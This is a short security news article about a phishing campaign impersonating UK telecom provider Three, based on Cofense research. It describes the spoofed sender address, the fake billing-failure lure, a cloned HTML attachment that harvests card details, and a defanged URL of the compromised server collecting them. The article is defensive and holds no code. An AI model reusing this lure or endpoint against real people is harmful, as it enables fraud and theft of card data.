The phishing emails purport to come from the UK telecom provier Three through a legitimate-looking email address, ‘online@three[.]co[.]uk’.
A phishing attack directed at the customers of a UK telecom provider has been uncovered recently. The attack purports to come from Three, a British telecommunications and internet service provider.
How does it operate?
The Cofense researchers revealed that the attack relies on a well-spoofed HTML file that prompts users to share their personal and credit card details. This phishing file comes attached in an email.
The targeted customers are informed that their bill payment could not be processed by the bank and are therefore asked to download the HTML file ‘3GUK[.]html’ to edit their billing information to avoid suspension of service.
Further investigation revealed that the source code is a clone of actual HTML code on a legitimate page of the UK-based telecom provider Three. In order to make it look convincing, the email includes ‘online@three[.]co[.]uk’ as the sender email address.
Any information provided by a victim is processed by the ‘processing[.]php’ script located at hxxp://joaquinmeyer[.]com/wb/processing[.]php, a domain the adversaries have compromised.
Final words
Users should always be wary of unsolicited requests to download and open HTML/HTM file attachments. These attachments are used as a channel by attackers to distribute malware designed to steal personal information from users.